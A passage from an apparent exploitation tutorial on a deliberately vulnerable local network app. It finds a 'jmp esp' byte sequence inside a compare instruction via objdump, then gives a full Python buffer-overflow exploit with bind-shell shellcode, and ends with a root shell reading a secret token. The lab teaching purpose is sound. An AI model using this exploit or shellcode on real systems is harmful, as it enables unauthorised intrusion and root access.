mov DWORD PTR [ebp-0xc],0x5/span/span span class="code-line"span class="x" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"span class="x" 8048cdf: c7 44 24 04 2c 8e 04 mov DWORD PTR [esp+0x4],0x8048e2c/span/span span class="code-line"span class="x" 8048ce6: 08 /span/span span class="code-line"span class="x" 8048ce7: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048ced: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cf0: e8 2b f9 ff ff call 8048620 lt;[email protected];/span/span span class="code-line"span class="x" 8048cf5: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048cf8: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048cfb: c9 leave /span/span span class="code-line"span class="x" 8048cfc: c3 ret /span/span span class="code-line"span class="x" 8048cfd: 90 nop/span/span span class="code-line"span class="x" 8048cfe: 90 nop/span/span span class="code-line"span class="x" 8048cff: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048d00/span span class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d00: 55 push ebp/span/span span class="code-line"span class="x" 8048d01: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d03: 5d pop ebp/span/span span class="code-line"span class="x" 8048d04: c3 ret /span/span span class="code-line"span class="x" 8048d05: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048d09: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048d10/span span class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d10: 55 push ebp/span/span span class="code-line"span class="x" 8048d11: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d13: 57 push edi/span/span span class="code-line"span class="x" 8048d14: 56 push esi/span/span span class="code-line"span class="x" 8048d15: 53 push ebx/span/span span class="code-line"span class="x" 8048d16: e8 4f 00 00 00 call 8048d6a lt;__i686.get_pc_thunk.bxgt;/span/span span class="code-line"span class="x" 8048d1b: 81 c3 e5 03 00 00 add ebx,0x3e5/span/span span class="code-line"span class="x" 8048d21: 83 ec 1c sub esp,0x1c/span/span span class="code-line"span class="x" 8048d24: e8 b7 f8 ff ff call 80485e0 lt;_initgt;/span/span span class="code-line"span class="x" 8048d29: 8d bb 04 ff ff ff lea edi,[ebx-0xfc]/span/span span class="code-line"span class="x" 8048d2f: 8d 83 00 ff ff ff lea eax,[ebx-0x100]/span/span span class="code-line"span class="x" 8048d35: 29 c7 sub edi,eax/span/span span class="code-line"span class="x" 8048d37: c1 ff 02 sar edi,0x2/span/span span class="code-line"span class="x" 8048d3a: 85 ff test edi,edi/span/span span class="code-line"span class="x" 8048d3c: 74 24 je 8048d62 lt;__libc_csu_init+0x52gt;/span/span span class="code-line"span class="x" 8048d3e: 31 f6 xor esi,esi/span/span span class="code-line"span class="x" 8048d40: 8b 45 10 mov eax,DWORD PTR [ebp+0x10]/span/span span class="code-line"span class="x" 8048d43: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048d47: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 8048d4a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048d4e: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048d51: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048d54: ff 94 b3 00 ff ff ff call DWORD PTR [ebx+esi*4-0x100]/span/span span class="code-line"span class="x" 8048d5b: 83 c6 01 add esi,0x1/span/span span class="code-line"span class="x" 8048d5e: 39 fe cmp esi,edi/span/span span class="code-line"span class="x" 8048d60: 72 de jb 8048d40 lt;__libc_csu_init+0x30gt;/span/span span class="code-line"span class="x" 8048d62: 83 c4 1c add esp,0x1c/span/span span class="code-line"span class="x" 8048d65: 5b pop ebx/span/span span class="code-line"span class="x" 8048d66: 5e pop esi/span/span span class="code-line"span class="x" 8048d67: 5f pop edi/span/span span class="code-line"span class="x" 8048d68: 5d pop ebp/span/span span class="code-line"span class="x" 8048d69: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048d6a/span span class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d6a: 8b 1c 24 mov ebx,DWORD PTR [esp]/span/span span class="code-line"span class="x" 8048d6d: c3 ret /span/span span class="code-line"span class="x" 8048d6e: 90 nop/span/span span class="code-line"span class="x" 8048d6f: 90 nop/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048d70/span span class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d70: 55 push ebp/span/span span class="code-line"span class="x" 8048d71: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d73: 53 push ebx/span/span span class="code-line"span class="x" 8048d74: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048d77: e8 00 00 00 00 call 8048d7c lt;_fini+0xcgt;/span/span span class="code-line"span class="x" 8048d7c: 5b pop ebx/span/span span class="code-line"span class="x" 8048d7d: 81 c3 84 03 00 00 add ebx,0x384/span/span span class="code-line"span class="x" 8048d83: 59 pop ecx/span/span span class="code-line"span class="x" 8048d84: 5b pop ebx/span/span span class="code-line"span class="x" 8048d85: c9 leave /span/span span class="code-line"span class="x" 8048d86: c3 ret/span/span span class="code-line"/code/pre/div /td/tr/table pThere aren't any codejmp esp/code's there, you can use grep to make it a little easier to go through:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep jmp/span span class="code-line"span class="go" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="go" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="go" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="go" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="go" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="go" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="go" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="go" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="go" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="go" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="go" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="go" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="go" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="go" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="go" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="go" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="go" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="go" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="go" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="go" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="go" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="go" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="go" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="go" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"span class="go" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="go" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="go" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="go" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="go" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"/code/pre/div /td/tr/table pHowever, we do have another option. codeobjdump/code shows the instructions as they would be run by the processor during normal operations, you don't necessarily have to use them this way, you can instead start execution in the middle of an instruction to create a new instruction./p pThis is what we are going to try to do (this was the reason for the extra check in the application too, as you will see)./p pFirst we need to figure out what a href="https://en.wikipedia.org/wiki/Opcode" target="_blank"opcodes/a codejmp esp/code results in, we start by creating a simple assembly application with just codejmp esp/code in it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"jmp/span span class="nb"esp/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble and link it; and then disassemble it with codeobjdump/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o jesp.o jesp.nasm /span span class="code-line"span class="gp"[email protected]:~$ /spanld -o jesp jesp.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./jesp -M intel/span span class="code-line"/span span class="code-line"span class="go"./jesp: file format elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Disassembly of section .text:/span/span span class="code-line"/span span class="code-line"span class="go"08048060 lt;_startgt;:/span/span span class="code-line"span class="go" 8048060: ff e4 jmp esp/span/span span class="code-line"/code/pre/div /td/tr/table pSo all we need to do is find codeff e4/code anywhere in the application code. A quick grep find us an instruction that contains this sequence:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep span class="s1"#39;ff e4#39;/span/span span class="code-line"span class="go" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the compare to code58623/code on line 104 of the source code above, code58623/code is actually codee4ff/code in hex and its stored as codeff e4/code because we are using a a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a system./p pThe start of this instruction is at the memory address code08048ccd/code and our codejmp esp/code is 3 bytes in, so just plus 3 to code08048ccd/code and we get code08048cd0/code. This is the address we will overwrite the return address with./p h2Exploiting The App/h2 pUsing all of the information we've retrieved so far we can build our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;Aquot;/span span class="o"*/span span class="mi"532/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xd0\x8c\x04\x08/spanspan class="s2"quot;/span span class="c1"# the address of our 0xff 0xe4/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"20/span span class="c1"# nop sled/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThe only changes here are, before we overwrite the return address we only send codeA/code's (532 of them, 528 for the local variables and 4 for the saved EBP), then we put our return address (the address of codejmp esp/code strong08048cd0/strong) and lastly we stick our a href="https://en.wikipedia.org/wiki/NOP_slide" target="_blank"NOP sled/a and shellcode (the NOP sled isn't actually needed though as we know ESP will point to the start of our code)./p pWe can now exploit the application, first run the app again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pNow launch the exploit and connect to our shell:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-net-exploit2.py /span span class="code-line"span class="gp"[email protected]:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"pwd/span/span span class="code-line"span class="go"/home/appuser/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"ls -l/span/span span class="code-line"span class="go"total 32/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rwxr-xr-x 1 appuser appuser 486 Jul 8 11:16 jesp/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 32 Jul 8 11:08 jesp.nasm/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 432 Jul 8 11:16 jesp.o/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="go"cat token/span/span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="go"cat